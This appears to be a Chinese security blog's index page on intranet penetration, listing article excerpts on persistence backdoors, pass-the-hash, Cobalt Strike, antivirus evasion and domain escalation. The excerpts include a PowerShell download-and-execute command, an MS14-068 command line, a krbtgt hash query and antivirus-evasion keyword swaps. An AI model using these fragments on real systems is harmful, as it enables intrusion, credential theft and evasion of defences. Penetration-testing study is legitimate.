
内网渗透
文章平均质量分 57
红云谈安全
把网络安全讲好、把技术搞好,这便是我的初心!网络安全赏金挖掘者,单个赏金上万元,一个月挖过10w漏洞赏金!
展开
-
域内权限维持思路总结
当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。Windows 操作系统常见持久性后门下面,我们先介绍几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划任务、Windows 新服务后门、WMI后门等等。Wind原创 2021-12-06 21:46:31 · 795 阅读 · 0 评论 -
内网横向移动—&Exchange 服务&有账户 CVE 漏洞&无账户口令爆破
Exchange是一个电子邮件服务组件,由微软公司开发。它不仅是一个邮件系统,还是一个消息与协作系统。Exchange可以用来构建企业、学校的邮件系统,同时也是一个协作平台,可以基于此开发工作流、知识管理系统、Web系统或其他消息系统。原创 2023-08-03 19:21:15 · 1374 阅读 · 1 评论 -
pop3 110端口渗透测试
Telnet 110端口,是我们在邮件设置中需要注意的问题,说明当服务器运行 Microsoft Exchange Server 5.0 和 5.5 时,如何远程登录到服务器的 110 端口.这有助于帮助解决 POP3 客户端和位于 Exchange Server 计算机的邮箱之间的通讯问题.遵守以下步骤来确认您与位于 Microsoft Exchange 上的邮箱之间正确的 POP3 连接."邮件编号"是指左边的数字.到这里我们就可以完成操作了。RETR DELE原创 2022-11-30 21:37:16 · 2198 阅读 · 3 评论 -
powershell免杀思路分析(过某60和某绒)
文章首发于:https://forum.butian.net/share/936写在前面powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难原创 2022-05-07 22:10:18 · 2803 阅读 · 0 评论 -
内网横向渗透之各种传递攻击
内网横向渗透之各种传递攻击前言在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透。横向渗透在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。利用PsExec工具进行横向渗透PsExec 最强大的功能之一是在远程系统和远程支持原创 2022-05-06 17:22:28 · 2439 阅读 · 1 评论 -
内网信息收集(超级全)
内网信息收集文章首发与奇安信攻防社区 https://forum.butian.net/share/236简介在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,所以信息收集的重要性不容小觑,看得懂并不代表会,不如自己实操一遍,这里将提供一个单域的环境下载地址,进行信息收集。单域环境这张图为这次信息收集所搭建的单域内网环境。工作组与域环境比较工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要到被访问计算原创 2022-02-09 11:49:19 · 3242 阅读 · 0 评论 -
LDAP概念和原理介绍
LDAP概念和原理介绍相信对于许多的朋友来说,可能听说过LDAP,但是实际中对LDAP的了解和具体的原理可能还比较模糊,今天就从“什么是LDAP”、“LDAP的主要产品”、“LDAP的基本模型”、“LDAP的使用案例”四个方面来做一个介绍。我们在开始介绍之前先来看几个问题:1. 我们日常的办公系统是不是有多个?2. 每个系统之间是不是都有独立的账号密码?3. 密码多了,有时候半天想不起来哪个密码对应哪个系统?4. 每次新项目的开发,都需要重.原创 2022-01-13 20:43:38 · 782 阅读 · 0 评论 -
cobalt strike插件的使用(超细!)
cobalt strike插件的使用(超细!)前言cobaltstrike作为渗透测试中不可缺少的利器,那么它到底厉害在哪里呢?在默认没有安装扩展的情况下可能功能并不是特别多,多数人会认为我已经基本掌握了cs的使用,但扩展就相当于我们的武器库,武器越多当然打起来也越爽,每次看别人的文章,发现自己的cs不是缺这就是缺那,压根没有办法实践,而且也很少有人会刻意说是哪个插件、哪里下载,这就给我们带来了非常大的困扰,索性就搜罗网上的插件进行全面加强自己的武器库,感谢大佬们分享的插件,以下使用的插件,将在文末提供。原创 2021-12-27 15:38:21 · 2752 阅读 · 1 评论 -
linux压缩和解压缩命令
tar 解包:tar zxvf filename.tar 打包:tar czvf filename.tar dirnamegz命令 解压1:gunzip filename.gz 解压2:gzip -d filename.gz 压缩:gzip filename .tar.gz 和 .tgz 解压:tar zxvf fil原创 2021-12-20 22:49:08 · 223 阅读 · 0 评论 -
全部的免杀思路分析(未看到比这个更全)
各种免杀思路分析,非常详细,想转载但是是攻防社区付费的文章https://forum.butian.net/share/969原创 2021-12-17 18:14:38 · 478 阅读 · 0 评论 -
powershell免杀思路(超细)
由于付费无法转载请查看请参看:https://forum.butian.net/share/936原创 2021-12-17 18:11:45 · 201 阅读 · 0 评论 -
Ubuntu18.04 配置网卡
2019/10/29, Ubuntu Server 18.04摘要:Ubuntu Server 18.04 采用netplan作为网络配置管理,修改IP使其连上网络,修改替换软件源修改网卡配置#首先使用ip a查看当前网卡名称:可以看到eth0就是我们的网卡名称,这个要记住,后面配置网卡要用到还有个叫lo的配置,是环回接口loopback进入网卡配置目录cd /etc/netplan/查看目录下文件,有个yaml后缀名的文件就是当前网络配置文件,我这里叫50-cloud-init..原创 2021-12-16 22:03:36 · 9556 阅读 · 0 评论 -
nc: getnameinfo: Temporary failure in name resolution
问题:阿里云服务器 使用 nc -lvvp 7777 监听端口 报错:nc: getnameinfo: Temporary failure in name resolution 解决 加个参数n nc -lvnp 7777 ...原创 2021-12-13 12:51:06 · 3354 阅读 · 0 评论 -
解决linux下cannot execute binary file: Exec format error
。对于linux下cannot execute binary file: Exec format error明确说明是执行文件格式错误,可能情况:1.使用错误的命令,如gcc -c hello.c -o hello,这样得到的是.o文件,而不是可执行程序,此时使用./hello就会报上述错误!此时应改用gcc hello.c -o hello就可以啦! 2.如果不是上述错误,就可能是版本问题,如本来是32位操作系统,偏偏使用64位软件,此时需要的就是使用正确的软件版本! 附:linux系统下遇到ca原创 2021-12-10 22:31:01 · 24388 阅读 · 0 评论 -
base64解决shell反弹无法上传文件问题
1、gcc xxx.c -o xxx编译一个c文件,也就相当于是exe2、base64 xxx 切记xxx后面一定要有一个空格3、复制黏贴后,在shell 中运行vim rr.64 复制内容上去4、后面直接base64 -d rr.64 > rr就可以了原创 2021-12-10 22:29:41 · 2759 阅读 · 0 评论 -
反弹shell后上传文件
转载于:https://www.freebuf.com/articles/system/178515.html在本文中,我将介绍一款自己编写的小工具NcPutter,并用它来实现在只有bash反弹shell情况下的文件上传。在渗透测试过程中,我们可能会遇到这样一种情景,即已将让目标机通过bash反弹shell与我们的机器建立了连接,需要向目标机上上传木马或其他可执行文件来做进一步提权或进行内网渗透,很多人可能会采用在目标机上执行wget、ftp、curl、nc等工具命令获取相关可执行文件,可这些方法有以下转载 2021-12-10 21:06:59 · 1563 阅读 · 0 评论 -
powershell免杀可替换的关键字
powershell免杀可替换的关键字关键字可替换IEX $DoIt -- i`ex $DoItIEX $a -- ie`x $a$var_runme -- $vrunme$var_buffer -- $vbufferfunc_get_proc_address -- func_kfunc_get_delegate_type -- func_l$var_type_builder -- $vk$var_parameters -- $vp$var_return_type-- $ve$v原创 2021-12-01 19:40:44 · 291 阅读 · 0 评论 -
各种反弹shell一键生成网站
请使用:https://forum.ywhack.com/shell.php原创 2021-12-01 17:57:25 · 3598 阅读 · 0 评论 -
Pupy – 全平台远程控制工具
项目地址https://github.com/n1nj4sec/pupy项目简介Pupy 是一个使用 python 编写并且开源的全平台远程控制工具,其客户端支持 Linux,Android,Windows,Osx 系统,并且提供多个利用模块, 用户也可以自己写模块,比如编写一个 D0ss 模块安装方法安装需要 python 版本 >=2.7git clone –recursive git://github.com/n1nj4sec/pupy.git pupypip install原创 2021-11-30 22:24:50 · 5855 阅读 · 0 评论 -
shell脚本练习
计算机网络老师 16:32:26任务1:使用case语句编写shell程序1、由用户从键盘输入一个字符,并判断该字符是否为字母、数字或者其他字符, 并输出相应的提示信息。代码:#!/bin/bashread -p “press some key ,then press return :” KEYcase $KEY in[a-z]|[A-Z])echo “It’s a letter.”;;[0-9])echo “It’s a digit.”;;*)echo “It’s functi原创 2021-11-30 20:00:12 · 357 阅读 · 0 评论 -
Tomcat后台爆破
目录1.1、影响版本1.2、环境搭建1.3、复现流程1.3.1、弱口令爆破--使用burpsuite爆破1.3.2、弱口令爆破--使用msf自带模块爆破1.4、部署war包上传getshell1.1、影响版本#Tomcat全版本1.2、环境搭建#1.利用vulhub已有的镜像,由于这个镜像启动后登录管理页面存在重复验证的问题,这里不再利用docker-compose.ymlCopy cd /root/vulhub/tomcat/tomcat8docker ...原创 2021-09-23 10:13:51 · 357 阅读 · 0 评论 -
cobaltstrike去除特征
cobaltstrike去除特征SSL证书设置 :此设置控制用于HTTPS通信的SSL证书。如果可能的话,请为你正在使用的域使用真实的,正确发布的SSL证书。LetsEncrypt可以发布所有主要操作系统和浏览器都信任的免费SSL证书,并且会让防御者更难以检查Beacon流量。生成SSL证书命令keytool -genkey -alias tenet -keyalg RSA -validity 36500 -keystore tenet.storetenet tenet.store这两个字符串要记原创 2021-09-22 12:50:53 · 167 阅读 · 0 评论 -
获取krbtgt的hash值
获取krbtgt的hash值krbtgt用户是在域控中才有的在msf中获取hashdump进入shell中获取wmic useracount where name="krbtgt" get sidcobaltstrike中获取logonpasswords原创 2021-09-22 10:00:13 · 1278 阅读 · 0 评论 -
C2concealer上线Linux注意事项
备注:如果使用C2concealer生成profile,需要配置listener时在profile中选择variant_1才行,不然可能会导致无法上线。原创 2021-09-16 20:00:02 · 112 阅读 · 0 评论 -
利用Nishang实现文件上传
利用Nishang实现文件上传Download_Execute是Nishang中一个下载执行脚本,它在实战中最常用的功能就是下载一个文本文件,然后将其转换为exe可执行文件执行。第一步:首先攻击者在本地用Nishang中的exetotext.ps1脚本将exe可执行文件更改为文本文件(这里我们的exe为msf生成的shell.exe)powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http:/原创 2021-09-16 18:44:38 · 83 阅读 · 0 评论 -
ms14-068提权域控
msf ms14-068 提权域控上传ms14-068.exe到目标主机的目录上upload /root/wwwhack23/ms14-068.exe C:/phpstudy_pro/www/www/www.webhack123.com/ms14-068.exe这些信息从metasploit 前期信息来的,可以翻到上面查看ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.1原创 2021-09-15 15:10:53 · 779 阅读 · 0 评论 -
Metasploit 中增加自定义 exploit 模块
如何向 Metasploit 中增加自定义 exploit 模块?童话tonghuaroot.com ;网络安全爱好者;不是黑客;3 人赞同了该文章0x00 前言在搞站的过程中,需要使用 Metasploit 自定义的exploit模块,我的Metasploit部署在公网的Linux上。网上公开的中文资料中,都没能解决我的问题。在网上搜索的资料中,都是向/usr/share/metasploit-framework/modules/exploits/目录下增加自定义模块,然而并不能解决我的问题。我的系统不存原创 2021-09-12 15:42:51 · 289 阅读 · 0 评论